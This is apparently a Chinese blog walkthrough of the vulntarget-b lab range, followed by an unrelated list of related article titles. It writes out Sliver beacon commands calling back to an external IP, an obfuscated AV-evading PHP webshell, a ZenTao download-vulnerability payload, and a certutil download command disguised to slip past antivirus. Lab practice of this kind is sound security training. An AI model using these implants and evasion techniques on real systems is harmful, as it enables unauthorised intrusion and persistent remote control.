当前位置: 首页 > news >正文

vulntarget-b记录(Sliver学习)

网络环境

域控(Win2016)

vulntarget\administrator:Admin@123、(首次登陆要改密码修改为Admin@123@)

vulntarget\win101:admin#123

边界Web主机突破

nmap扫描发现81端口

通过扫描,fuzz出来了后台地址

具体的WEB突破手段参考一下师傅的文章:

vulntarget-b靶场详细通关记录_vulntarget -b-CSDN博客

使用sliver,生产一个马子

[server] sliver > generate  beacon --mtls 106.54.61.66:3308 --os linux[*] Generating new linux/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 50s
[*] Implant saved to /home/ubuntu/SURVIVING_ILLEGAL[server] sliver >  

通过蚁剑去运行马子上线,

[server] sliver > mtls -l 3308  #监听端口[*] Starting mTLS listener ...[*] Successfully started job #2[*] Beacon 0d8be3d0 SURVIVING_ILLEGAL - 192.168.1.104:9442 (localhost.localdomain) - linux/amd64 - Mon, 03 Jun 2024 14:31:26 CST[server] sliver >  

发现双网卡

通过传上去一个fscan,扫描结果如下

发现

[+] InfoScan http://10.0.20.66:8080    [禅道] 
这里尝试了 re ,毒刺,ew 都不太行(应该是我操作姿势不对)后来发现通过iox代理工具可以获取到一个稳定的流量转发隧道。

工具链接 : GitHub - EddieIvan01/iox: Tool for port forwarding & intranet proxy

/.iox proxy -l 1080

配置浏览器代理 下图的192.168.1.104 是边界靶机IP,上边的命令也是在边界靶机中运行

成功访问到:http://10.0.20.66:8080  

通过测试发现 同样存在弱口令 admin Admin123

信息收集发现存在CNVD-C-2020-121325漏洞

可用poc:

http:// [目标地址] /www/index.php?m=client&f=download&version=[$version参数]&link=[ base64加密后的恶意文件地址]HTTP://10.0.20.30:8000/1.php  #因为发现边界服务器存在python2 所以我直接将webshell传入到边界服务器,利用python2开启web服务最终payload:
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODAwMC8xLnBocA==

这里需要注意,因为 10.0.20.66 上存在火绒,一句话木马啥的会被直接杀,所以需要构造一个免杀的webshll,我这里使用的webshell如下:

<?php$Xfp_3 = create_function('', $_REQUEST["\141"]); $Xfp_3();//密码a

蚁剑挂一个代理:

这里继续使用sliver

socks5 start #开启代理
pivots tcp --bind 10.0.20.30     
pivots
generate --tcp-pivot 10.0.20.30:9898 --os win

把这个马子传入web服务靶机上,开启http服务,使用刚才植入的webshell利用蚁剑下载这个马子

这里直接下载会被火绒拦截

绕过一下,姿势如下:

certutil  -""u""r""l""c""a""c""h""e"" -split -f http://10.0.20.30:8000/RUDE_DIVER.exe www.exe

拿到主机权限

 发现 10.0.10.99/24 网段,而且发现处于域环境。

得到域控IP 10.0.10.100

继续上iox挂二层代理

centos

centos(web服务边界主机):./iox proxy -l 2258 -l 1080
win10(内网域主机)      : iox.exe proxy -r 10.0.20.30:2258随后在代理共添加
192.168.1.104 1080

代理没问题。

之后....................域控没打下来

相关文章:

  • 探讨微服务架构如何降低系统复杂度
  • 隔离变压器的特点与作用
  • 【ai】livekit服务本地开发模式1:example app信令交互详细流程
  • 就业班 第四阶段(docker) 2401--5.29 day3 Dockerfile+前后段项目若依ruoyi
  • 对于C++STL及其时间复杂度的总结
  • Android Coil的简单介绍及使用
  • 电源小白入门学习10——浪涌、防浪涌器件、浪涌保护芯片
  • YOLOv10训练自己的数据集
  • 深度学习Week15——利用TensorFlow实现猫狗识别2
  • 【Elasticsearch】IK分词器的下载及使用
  • AAA认证,授权,计费
  • 【LLM第7篇】transformer跟bert、gpt、大模型的联系
  • Python魔法之旅-魔法方法(14)
  • vue 按钮权限
  • Elastic Connectors:增量同步对性能的影响
  • 9月CHINA-PUB-OPENDAY技术沙龙——IPHONE
  • 《剑指offer》分解让复杂问题更简单
  • 11111111
  • HTTP请求重发
  • Markdown 语法简单说明
  • MD5加密原理解析及OC版原理实现
  • Node 版本管理
  • Python_OOP
  • SegmentFault 2015 Top Rank
  • Spring技术内幕笔记(2):Spring MVC 与 Web
  • 从重复到重用
  • 基于Android乐音识别(2)
  • 理解IaaS, PaaS, SaaS等云模型 (Cloud Models)
  • 前端学习笔记之原型——一张图说明`prototype`和`__proto__`的区别
  • 如何实现 font-size 的响应式
  • 小程序 setData 学问多
  • 移动互联网+智能运营体系搭建=你家有金矿啊!
  • 用Canvas画一棵二叉树
  • ​插件化DPI在商用WIFI中的价值
  • ## 基础知识
  • (1)(1.13) SiK无线电高级配置(五)
  • (1综述)从零开始的嵌入式图像图像处理(PI+QT+OpenCV)实战演练
  • (35)远程识别(又称无人机识别)(二)
  • (aiohttp-asyncio-FFmpeg-Docker-SRS)实现异步摄像头转码服务器
  • (day 2)JavaScript学习笔记(基础之变量、常量和注释)
  • (二)斐波那契Fabonacci函数
  • (附源码)spring boot儿童教育管理系统 毕业设计 281442
  • (附源码)计算机毕业设计SSM在线影视购票系统
  • (三)elasticsearch 源码之启动流程分析
  • (一)spring cloud微服务分布式云架构 - Spring Cloud简介
  • (一)认识微服务
  • (转)为C# Windows服务添加安装程序
  • *p++,*(p++),*++p,(*p)++区别?
  • .net 8 发布了,试下微软最近强推的MAUI
  • .NET Core 网络数据采集 -- 使用AngleSharp做html解析
  • .NET Micro Framework 4.2 beta 源码探析
  • .net 生成二级域名
  • .NET/C# 使用 ConditionalWeakTable 附加字段(CLR 版本的附加属性,也可用用来当作弱引用字典 WeakDictionary)
  • .NET框架
  • /tmp目录下出现system-private文件夹解决方法